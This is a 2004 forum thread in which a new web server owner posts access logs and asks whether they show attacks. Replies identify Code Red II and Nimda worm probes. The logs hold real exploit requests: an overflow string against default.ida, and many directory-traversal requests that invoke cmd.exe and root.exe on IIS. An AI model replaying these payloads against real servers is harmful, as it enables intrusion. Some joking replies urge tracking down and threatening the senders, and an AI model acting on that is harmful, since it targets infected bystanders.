Help - Search - Members - Calendar
Full Version: Is This An Attack?
Linuxhelp > Support > Technical Support
StevenMig
I am not 100% sure if this is the place to ask, but the securitry forum seemed to only post exploits. Anyway, I set up a web server, just to test it out.
I haven't had my computer on too much,
Only two days, and not even full ones, but I found some interesting log entries
CODE
68.20.213.67 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 405 "-" "-"

68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:30 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"

I don't care about the people or tracking them down, but one of my goals for running a server is to
help me learn about computer security, so I am wondering if I identified this correctly as an attack.
The first one looks like a buffer overflow, and the rest look like a canned program looking for vulnerable
scripts or trying to open a command prompt (obviously the attacker or program didn't do any checking
considering most of the request are for a windows server.
hughesjr
The one with all the xxxxxxxxxxxxxxxx's is an infected code red II server trying to infect your server.


The Ones with the .exe files is NIMDA.

If you were running an IIS server that is unpatched, then it would now be infected....
Termina
QUOTE
don't care about the people or tracking them down


Screw that, track down the bastards and make them pay. If not legally, then get the home address, and... *coughs*

*darts eyes around, and hands him a hachet*
Robert83
yeah smile.gif)

give her/him a zergling rush smile.gif smile.gif smile.gif


Sincerely
Robert B
StevenMig
Wow, less than day of uptime and this already. Anyway, should I really track them down?
Now I know I have to get my act together, If anything targeted me, I think I'd be pretty screwed. I haven't changed anything on my apache server.
Termina
Yes, you really should.

Atleast scare them for awhile. If you let them think they can get away with this kind of shit, they'll just keep doing it. If you threaten them with a lawsuit (especially if they're under 18), they'll piss themselves
hughesjr
There are thousands of NIMDA and CODE RED infected servers out there ... they aren't doing it on purpose. (It is a worm ... if your server is infected .. it automatically tries to infect other servers). So long as you are not running IIS, I would just not worry about it. If you are running IIS and you haven't patched ... get a good anti virus progam and scan your PC...
Termina
Ah... *falls over*

Too bad. =/ I... hate... people who do that kind of stuff. >_<

*grumbles and mutters*

Robert: Do you play starcraft (currently?)? If so, want to face me sometime? (Havn't played in a few months, but would love a match sometime)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2017 Invision Power Services, Inc.